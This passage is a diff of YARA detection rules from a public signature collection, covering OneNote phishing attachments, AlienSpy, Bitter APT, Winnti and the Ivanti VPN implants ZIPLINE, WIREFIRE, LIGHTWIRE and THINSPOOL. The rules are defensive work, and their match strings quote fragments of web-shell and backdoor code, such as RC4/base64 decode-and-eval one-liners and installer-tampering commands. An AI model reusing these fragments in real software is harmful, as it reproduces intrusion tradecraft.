+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6f7b2e00921129d18061822197111cd" or 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_1 : FILE
+rule SIGNATURE_BASE_EXT_APT_Bitter_Win32K_0Day_Feb21 : FILE
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "801e7efc-2c31-5590-afcd-9e11072c9c65"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L2-L16"
+		description = "Detects code that exploits a Windows 0day exploited by Bitter APT group"
+		author = "dbappsecurity_lieying_lab"
+		id = "b1892b52-4b94-5571-ad63-8750a321f1f2"
+		date = "2021-01-01"
+		modified = "2023-12-05"
+		reference = "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bitter.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "683f4651eb8c5b74eca16e7f97c5c44f0d70f045ea49f1f3726cb6975aba2ab9"
-		score = 70
+		logic_hash = "84a8d0ae14469eb6431e73295d821609c7a8b313630d645085ffd8faff6e5e43"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "&&set "
+		$s1 = "NtUserConsoleControl" ascii wide
+		$s2 = "NtCallbackReturn" ascii wide
+		$s3 = "CreateWindowEx" ascii wide
+		$s4 = "SetWindowLong" ascii wide
+		$a1 = {48 C1 E8 02 48 C1 E9 02 C7 04 8A}
+		$a2 = {66 0F 1F 44 00 00 80 3C 01 E8 74 22 FF C2 48 FF C1}
+		$a3 = {48 63 05 CC 69 05 00 8B 0D C2 69 05 00 48 C1 E0 20 48 03 C1}
 
 	condition:
-		filesize < 300KB and uint32( 0 ) == 0x20746573 and $s1 in ( 0 .. 32 )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_2 : FILE
+rule SIGNATURE_BASE_SUSP_CMD_Var_Expansion : FILE
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "999cd365-2862-5618-b0b6-ee45dea1e9cf"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L18-L35"
+		description = "Detects Office droppers that include a variable expansion string"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f3ebea0-1d33-513d-b32b-9d87607525e8"
+		date = "2018-09-26"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/asfakian/status/1044859525675843585"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_cmd_var_expansion.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "729ec93d180bf39c146c3fd847655340428abc3231b556ca51d3ca68825e7c3e"
-		score = 70
+		logic_hash = "68ce14cac07494645f3b5f1d61012e4fe21cfa9fa7ad4019add2368b568fe043"
+		score = 60
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "&&set "
+		$a1 = " /V:ON" ascii wide fullword
 
 	condition:
-		filesize < 300KB and #s1 > 30 and uint16( filesize -2 ) == 0x0a0d and uint8( filesize -3 ) == 0x25
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1
 }
-rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_3 : FILE
+rule SIGNATURE_BASE_Crime_Win_Rat_Alienspy : FILE
 {
 	meta:
-		description = "Detects indicators of obfuscation in Windows Batch files"
-		author = "Florian Roth"
-		id = "a484ed03-8588-55e7-9674-b1208e14eb3f"
-		date = "2024-07-12"
-		modified = "2024-12-12"
-		reference = "https://x.com/0xToxin/status/1811656147943752045"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L37-L54"
+		description = "Alien Spy Remote Access Trojan"
+		author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
+		id = "a79789cd-9b16-58f5-ab51-48bb900583d1"
+		date = "2015-04-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_alienspy_rat.yar#L2-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ecbe7850349f0368620ff4294e5d0ca277983799eed510f8bf8abe4d4c192197"
-		score = 70
+		logic_hash = "2b6fec104a89badb057619f648119dcf6debd294ee2b80a1fde6ffa30a7a45f7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
+		reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
+		filetype = "Java"
+		hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
+		hash_2 = "818afea3040a887f191ee9d0579ac6ed"
+		hash_3 = "973de705f2f01e82c00db92eaa27912c"
+		hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
+		hash_5 = "071e12454731161d47a12a8c4b3adfea"
+		hash_6 = "a7d50760d49faff3656903c1130fd20b"
+		hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
+		hash_8 = "3698a3630f80a632c0c7c12e929184fb"
+		hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
 
 	strings:
-		$s1 = "% \\\\%"
-		$s2 = { 3D ?? 26 26 73 65 74 20 }
+		$sa_1 = "META-INF/MANIFEST.MF"
+		$sa_2 = "Main.classPK"
+		$sa_3 = "plugins/Server.classPK"
+		$sa_4 = "IDPK"
+		$sb_1 = "config.iniPK"
+		$sb_2 = "password.iniPK"
+		$sb_3 = "plugins/Server.classPK"
+		$sb_4 = "LoadStub.classPK"
+		$sb_5 = "LoadStubDecrypted.classPK"
+		$sb_7 = "LoadPassword.classPK"
+		$sb_8 = "DecryptStub.classPK"
+		$sb_9 = "ClassLoaders.classPK"
+		$sc_1 = "config.xml"
+		$sc_2 = "options"
+		$sc_3 = "plugins"
+		$sc_5 = "util/OSHelper"
+		$sc_6 = "Start.class"
+		$sc_7 = "AlienSpy"
 
 	condition:
-		filesize < 300KB and all of them
+		uint16( 0 ) == 0x4B50 and filesize < 800KB and ( ( all of ( $sa_* ) ) or ( all of ( $sb_* ) ) or ( all of ( $sc_* ) ) )
 }
-rule SIGNATURE_BASE_Office_Autoopen_Macro : FILE
+rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects an Microsoft Office file that contains the AutoOpen Macro function"
+		description = "Detects suspicious OneNote attachment that embeds suspicious payload, e.g. an executable (FPs possible if the PE is attached separately)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9774d96c-4d15-5a54-8fe2-e06372d9c4ec"
-		date = "2015-05-28"
+		id = "492b74c2-3b81-5dff-9244-8528565338c6"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L2-L26"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L2-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23c834828e7a9ea966e5d7247881bbbf9180b8f08297e36cd36d2ba5f621c70d"
-		score = 40
+		logic_hash = "c7c5fc86f1dbe54da2d3ff8f039c5e53c3d1f67c9271cb467b2318310f744f93"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d00695d5011427efc33c9722c61ced2"
-		hash2 = "63f6b20cb39630b13c14823874bd3743"
-		hash3 = "66e67c2d84af85a569a04042141164e6"
-		hash4 = "a3035716fe9173703941876c2bde9d98"
-		hash5 = "7c06cab49b9332962625b16f15708345"
-		hash6 = "bfc30332b7b91572bfe712b656ea8a0c"
-		hash7 = "25285b8fe2c41bd54079c92c1b761381"
 
 	strings:
-		$s1 = "AutoOpen" ascii fullword
-		$s2 = "Macros" wide fullword
+		$ge1 = "5xbjvWUmEUWkxI1NC3qer"
+		$ge2 = "cW471lJhFFpMSNTQt6nq"
+		$ge3 = "nFuO9ZSYRRaTEjU0Lep6s"
+		$sp1 = "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZG"
+		$sp2 = "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
+		$sp3 = "UaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZ"
+		$sp4 = "VGhpcyBwcm9ncmFtIG11c3QgYmUgcnVuIHVuZGVy"
+		$sp5 = "RoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlc"
+		$sp6 = "UaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZX"
+		$se1 = "QGVjaG8gb2Zm"
+		$se2 = "BlY2hvIG9mZ"
+		$se3 = "AZWNobyBvZm"
+		$se4 = "PEhUQTpBUFBMSUNBVElPTi"
+		$se5 = "xIVEE6QVBQTElDQVRJT04g"
+		$se6 = "8SFRBOkFQUExJQ0FUSU9OI"
+		$se7 = "TAAAAAEUAg"
+		$se8 = "wAAAABFAIA"
+		$se9 = "MAAAAARQCA"
 
 	condition:
-		( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x504b0304 ) and all of ( $s* ) and filesize < 300000
+		filesize < 5MB and 1 of ( $ge* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Office_As_MHTML : CVE_2012_0158 FILE
+rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_2 : FILE
 {
 	meta:
-		description = "Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)"
+		description = "Detects suspicious OneNote attachment that has a file name often used in phishing attacks"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21c0c3da-7295-54ad-9947-557a3180af3a"
-		date = "2015-05-28"
+		id = "f8c58c73-2404-5ce6-8e8f-99b0dad84ad0"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L28-L50"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L41-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5836a9c627e2e6833ea9e27526c76c00fc1fcf1fca8ea10777aa6f4bcc25053"
-		score = 40
+		logic_hash = "eb6f992ce186022f04613af3bf4df629b00d85eac151f8bbd4b8ef96e6892eab"
+		score = 65
 		quality = 85
-		tags = "CVE-2012-0158, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8391d6992bc037a891d2e91fd474b91bd821fe6cb9cfc62d1ee9a013b18eca80"
-		hash2 = "1ff3573fe995f35e70597c75d163bdd9bed86e2238867b328ccca2a5906c4eef"
-		hash3 = "d44a76120a505a9655f0224c6660932120ef2b72fee4642bab62ede136499590"
-		hash4 = "5b8019d339907ab948a413d2be4bdb3e5fdabb320f5edc726dc60b4c70e74c84"
+		tags = "FILE"
 
 	strings:
-		$s1 = "Content-Transfer-Encoding: base64" ascii fullword
-		$s2 = "Content-Type: application/x-mso" ascii fullword
-		$x1 = "QWN0aXZlTWltZQA" ascii
-		$x2 = "0M8R4KGxGuE" ascii
+		$hc1 = { 2E 6F 6E 65 22 0D 0A 0D 0A 35 46 4A 63 65 }
+		$x01 = " attachment; filename=\"Invoice" nocase
+		$x02 = " attachment; filename=\"ORDER" nocase
+		$x03 = " attachment; filename=\"PURCHASE" nocase
+		$x04 = " attachment; filename=\"SHIP" nocase
 
 	condition:
-		uint32be( 0 ) == 0x4d494d45 and all of ( $s* ) and 1 of ( $x* )
+		filesize < 5MB and $hc1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Docm_In_PDF : FILE
+rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects an embedded DOCM in PDF combined with OpenAction"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08dfdfda-8ea5-530d-b89b-560415855080"
-		date = "2017-05-15"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L52-L66"
+		description = "Detects suspicious embedded file types in OneNote files"
+		author = "Florian Roth"
+		id = "b8ea8c7b-052f-5a97-9577-99903462ea84"
+		date = "2023-01-27"
+		modified = "2023-02-27"
+		reference = "https://blog.didierstevens.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L63-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "045cde0e8f9e0881c2caece7d5660e165aa67b43bed2ba6d4929951497d76494"
-		score = 75
-		quality = 60
+		logic_hash = "d91ca297ea96f80534085f174d335ffe961c569534f043c5c2ae8d6a9f7ac083"
+		score = 65
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = /<<\/Names\[\([\w]{1,12}.docm\)/ ascii
-		$a2 = "OpenAction" ascii fullword
-		$a3 = "JavaScript" ascii fullword
+		$x1 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 4d 5a }
+		$x2 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 40 65 63 68 6f }
+		$x3 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 40 45 43 48 4f }
+		$x4 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 4F 6E 20 45 }
+		$x5 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 6F 6E 20 65 }
+		$x6 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 4c 00 00 00 }
+		$x7 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 49 54 53 46 }
+		$x8 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 68 74 61 3A }
+		$x9 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 48 54 41 3A }
+		$x10 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 6A 6F 62 20 }
 
 	condition:
-		uint32( 0 ) == 0x46445025 and all of them
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Twinpeaks : FILE
+rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_2 : FILE
 {
 	meta:
-		description = "Detects Winnti samples"
-		author = "@br_data repo"
-		id = "2e4e2b88-fdb4-5adc-8192-a304d71ca851"
-		date = "2019-07-24"
+		description = "Detects suspicious embedded file types in OneNote files"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0664d202-ab4c-57b6-91ee-ea21ac08909e"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L3-L15"
+		reference = "https://blog.didierstevens.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_onenote_phish.yar#L108-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76457f5aa4cc4bf4f43ffbaa60d63006455977e881f1d74b845835c505a93fed"
-		score = 75
+		logic_hash = "bc07598570b6d4ebc5d14cedfed146c1ad309b8890bc0b9ee5f9ad645c1352e2"
+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$cooper = "Cooper"
-		$pattern = { e9 ea eb ec ed ee ef f0}
+		$a1 = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$s1 = "<HTA:APPLICATION "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $cooper and ( $pattern in ( @cooper [ 1 ] .. @cooper [ 1 ] + 100 ) )
+		filesize < 5MB and $a1 and 1 of ( $s* )
 }
-
-rule SIGNATURE_BASE_MAL_BR_Report_Thedao : FILE
+rule SIGNATURE_BASE_APT_UNC5221_Ivanti_Forensicartifacts_Jan24_1 : FILE
 {
 	meta:
-		description = "Detects indicator in malicious UPX packed samples"
-		author = "@br_data repo"
-		id = "5cc932d7-2ec6-5570-af4a-3f64b39e6db5"
-		date = "2019-07-24"
-		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L17-L28"
+		description = "Detects forensic artifacts found in the Ivanti VPN exploitation campaign by APT UNC5221"
+		author = "Florian Roth"
+		id = "49ba2a96-379d-5a58-979d-45e83fa546e7"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "798b092b7667462aa66590603504cb0cd1166e4ac3472627cd8cd8fdf8f0b778"
+		logic_hash = "7f485f41072f5584dc76e71564e13066d9fe41685f33bff9c2886fa7d2155f94"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$b = { DA A0 }
+		$x1 = "system(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");"
+		$x2 = "SSH-2.0-OpenSSH_0.3xx."
+		$x3 = "sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $b at pe.overlay.offset and pe.overlay.size > 100
+		filesize < 5MB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Winnti_BR_Report_Mockingjay : FILE
+rule SIGNATURE_BASE_M_Hunting_Backdoor_ZIPLINE_1 : FILE
 {
 	meta:
-		description = "Detects Winnti samples"
-		author = "@br_data repo"
-		id = "9aff9d65-3827-59de-9dc3-38f227155d3d"
-		date = "2019-07-24"
-		modified = "2023-12-05"
-		reference = "https://github.com/br-data/2019-winnti-analyse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_br.yar#L30-L46"
+		description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."
+		author = "Mandiant"
+		id = "753884d6-d4c1-5e94-9d2c-f6ebb7bfaf85"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L18-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7a63b6f10cc5feebba16e585cb29d741876e1dc7f4dde3ef43ac76db9c7ad135"
+		logic_hash = "41857ba465dd1f2e1aa8c1eed36b73606385eeedf233fd480bb8a4ef15499174"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$load_magic = { C7 44 ?? ?? FF D8 FF E0 }
-		$iter = { E9 EA EB EC ED EE EF F0 }
-		$jpeg = { FF D8 FF E0 00 00 00 00 00 00 }
+		$s1 = "SSH-2.0-OpenSSH_0.3xx" ascii
+		$s2 = "$(exec $installer $@)" ascii
+		$t1 = "./installer/do-install" ascii
+		$t2 = "./installer/bom_files/" ascii
+		$t3 = "/tmp/data/root/etc/ld.so.preload" ascii
+		$t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $jpeg and ( $load_magic or $iter in ( @jpeg [ 1 ] .. @jpeg [ 1 ] + 200 ) ) and for any i in ( 1 .. #jpeg ) : ( uint8( @jpeg [ i ] + 11 ) != 0 )
+		uint32( 0 ) == 0x464c457f and filesize < 5MB and ( ( 1 of ( $s* ) ) or ( 3 of ( $t* ) ) )
 }
-
-rule SIGNATURE_BASE_BKDR_Snarasite_Oct17 : FILE
+rule SIGNATURE_BASE_M_Hunting_Dropper_WIREFIRE_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3a5d156a-529b-52ae-9b6a-d454895eb1fb"
-		date = "2017-10-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_snarasite.yar#L3-L17"
+		description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
+		author = "Mandiant"
+		id = "051244f0-00b1-5a4b-8c81-f4ce6f1aa22a"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79f49bce6de996d20b64476feb73987fdcd7555963ea1a596648d8702fbd2898"
+		hash = "6de651357a15efd01db4e658249d4981"
+		logic_hash = "c389a666bd093cdd7700385da43c8fa58b9f3d899e658c516df0f3aca439401d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "36ba92cba23971ca9d16a0b4f45c853fd5b3108076464d5f2027b0f56054fd62"
+
+	strings:
+		$s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
+		$s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
+		$s3 = "Handles DELETE request to delete an existing visits data." ascii
+		$s4 = "request.data.decode().startswith('GIF'):" ascii
+		$s5 = "Utils.api_log_admin" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "322bef04e1e1ac48875036e38fb5c23c" or pe.imphash ( ) == "15088754757513c92fa36ba5590e907b" )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Ivanti_EPMM_Mobileiron_Core_CVE_2023_35078_Jul23_1 : CVE_2023_35078
+rule SIGNATURE_BASE_M_Hunting_Webshell_LIGHTWIRE_2 : FILE
 {
 	meta:
-		description = "Detects the successful exploitation of Ivanti Endpoint Manager Mobile (EPMM) / MobileIron Core CVE-2023-35078"
-		author = "Florian Roth"
-		id = "44cca0b5-3851-5786-82fd-ce3ccb566453"
-		date = "2023-07-25"
-		modified = "2023-12-05"
-		reference = "Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-35078 - Analysis Guidance"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L2-L14"
+		description = "Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner."
+		author = "Mandiant (modified by Florian Roth)"
+		id = "9451da63-c68e-51e8-b4b1-c3082d46fbf6"
+		date = "2024-01-11"
+		modified = "2024-01-12"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L60-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ebc59032b7450aa438ca30170560c95550cda6ff7774b8ce1486309716da9e6c"
+		hash = "3d97f55a03ceb4f71671aa2ecf5b24e9"
+		logic_hash = "37b22a6c45dd53bc7b3f0c75cc5072e990246fea24591d192176c0b496e92084"
 		score = 75
-		quality = 60
-		tags = "CVE-2023-35078"
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$xr1 = /\/mifs\/aad\/api\/v2\/[^\n]{1,300} 200 [1-9][0-9]{0,60} /
+		$s1 = "eval{my"
+		$s2 = "Crypt::RC4->new(\""
+		$s3 = "->RC4(decode_base64(CGI::param('"
+		$s4 = ";eval $"
+		$s5 = "\"Compatibility check: $@\";}"
 
 	condition:
-		$xr1
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Mi_War_Aug23 : CVE_2023_35078 FILE
+rule SIGNATURE_BASE_M_Hunting_Dropper_THINSPOOL_1 : FILE
 {
 	meta:
-		description = "Detects WAR file found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
-		author = "Florian Roth"
-		id = "cd16cf29-a90d-5c3f-b66f-e9264dbf79fb"
-		date = "2023-08-01"
-		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L16-L32"
+		description = "This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system."
+		author = "Mandiant"
+		id = "dd340f72-0a2c-5b66-9e31-1c0f20cd842f"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L83-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0083727e34118d628c8507459bfb7f949f11af8197e201066e29e263e2c3f944"
-		score = 85
+		hash = "677c1aa6e2503b56fe13e1568a814754"
+		logic_hash = "a8043822cd36a802ba6656c42085f09d67cedb0689c9da48438d788b320bd6c0"
+		score = 75
 		quality = 85
